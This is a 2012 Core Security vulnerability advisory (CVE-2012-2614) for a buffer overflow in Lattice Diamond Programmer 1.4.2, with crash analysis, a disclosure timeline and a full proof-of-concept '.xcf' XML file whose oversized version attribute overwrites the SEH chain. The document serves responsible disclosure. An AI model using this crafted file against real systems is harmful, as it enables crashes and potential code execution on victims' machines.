Lattice Diamond Programmer Buffer Overflow

Lattice Diamond Programmer Buffer Overflow


1. *Advisory Information*

Title: Lattice Diamond Programmer Buffer Overflow
Advisory ID: CORE-2012-0530
Advisory URL:
http://www.coresecurity.com/content/lattice-diamond-programmer-buffer-overflow
Date published: 2012-06-21
Date of last update: 2012-06-21
Vendors contacted: Lattice Semiconductor Corporation
Release mode: User release


2. *Vulnerability Information*

Class: Buffer overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2012-2614


3. *Vulnerability Description*

Lattice Diamond Programmer [1] is vulnerable to client-side attacks,
which can be exploited by remote attackers to run arbitrary code by
sending specially crafted '.xcf' files.


4. *Vulnerable packages*

   . Diamond Programmer 1.4.2 for Windows.
   . Older versions are probably affected too, but they were not checked.


5. *Non-vulnerable packages*

   . Vendor did not provide this information.


6. *Vendor Information, Solutions and Workarounds*

The vendor did not reply any contact email sent by Core Security
Advisories Team. Contact Lattice for further information about this
issue [2]. Given that this is a client-side vulnerability, affected
users should not open untrusted '.xcf' files using 'programmer.exe' nor
'deployment.exe'.


7. *Credits*

This vulnerability was discovered and researched by Daniel Kazimirow and
Ricardo Narvaja from Core Security Exploit Team.


8. *Technical Description / Proof of Concept Code*

This vulnerability can be exploited by opening a specially crafted
'.xcf' file from 'programmer.exe'. The module 'deployment.exe' may also
be vulnerable, but this possiblity was not researched any further.

The XML file showed at [Sec. 8.1] crashes 'programmer.exe' at the address:

/-----
00FB5E20    8A0402          MOV AL,BYTE PTR DS:[EDX+EAX]
00FB5E23    C2 0400         RETN 4
-----/

 and overwrites the SEH chain (there is no SEH protection) with
'41414141', which is proof that the buffer was overflown. This means
that there is a buffer overflow vulnerability, and 'EIP' can be set to
an arbitrary value, allowing an attacker to take control of the machine.


8.1. *Proof of Concept*

/-----
<?xml version='1.0' encoding='utf-8' ?>
<!DOCTYPE        ispXCF    SYSTEM    "IspXCF.dtd" >
<ispXCF
version="8.9.09.09999999999AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
    <Comment></Comment>
    <Chain>
        <Comm>JTAG</Comm>
        <Device>
            <Pos>1</Pos>
            <Vendor>Lattice</Vendor>
            <Family>ispLSI 5000VE</Family>
            <Name>5256VE</Name>
            <IDCode>0x00368043</IDCode>
            <Package>128-pin TQFP</Package>
            <PON>ispLSI5256VE-XXLT128</PON>
            <Bypass>
                <InstrLen>5</InstrLen>
                <InstrVal>11111</InstrVal>
                <BScanLen>1</BScanLen>
                <BScanVal>0</BScanVal>
            </Bypass>
            <File>C:\ispTOOLS\ispvmsystem\TutorialU6vea.jed</File>
            <FileTime>05/17/02 18:15:33</FileTime>
            <JedecChecksum>0xF9BD</JedecChecksum>
            <Operation>Erase,Program,Verify</Operation>
            <Option>
                <SVFVendor>JTAG STANDARD</SVFVendor>
                <IOState>HighZ</IOState>
               
<IOVectorData>0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000</IOVectorData>
                <Reinitialize value="TRUE"/>
                <OverideUES value="TRUE"/>
                <TCKFrequency>1.000000 MHz</TCKFrequency>
                <SVFProcessor>ispVM</SVFProcessor>
                <Usercode>0x0000F9BD</Usercode>
            </Option>
        </Device>
    </Chain>
    <ProjectOptions>
        <Program>SEQUENTIAL</Program>
        <Process>ENTIRED CHAIN</Process>
        <OperationOverride>No Override</OperationOverride>
        <StartTAP>TLR</StartTAP>
        <EndTAP>TLR</EndTAP>
        <DeGlitch value="TRUE"/>
        <VerifyUsercode value="TRUE"/>
        <PinSetting>
            TMS    LOW;
            TCK    LOW;
            TDI    LOW;
            TDO    LOW;
            TRST    ABSENT;
            CableEN    HIGH;
        </PinSetting>
    </ProjectOptions>
</ispXCF>
-----/


9. *Report Timeline*

. 2012-05-30:
Core Security Technologies notifies Lattice Semiconductor Corporation of
the vulnerability. Publication date is set for June 26th, 2012.

. 2012-06-06:
Core notifies Lattice Semiconductor Corporation of the vulnerability.

. 2012-06-11:
Core notifies that the previous emails were not answered and requests
for a reply.

. 2012-06-11:
Vendor asks Core to remove their email addresses from Core's mailing lists.

. 2012-06-11:
Core requests an email address or any other security contact information
at Lattice in order to begin discussions in regards to the
vulnerability. No reply was received.

. 2012-06-21:
Advisory CORE-2012-0530 published.


10. *References*

[1] http://www.latticesemi.com/products/designsoftware/diamond/index.cfm.
[2] Lattice technical support, mailto:[email protected]



#  0day.today [2018-02-19]  #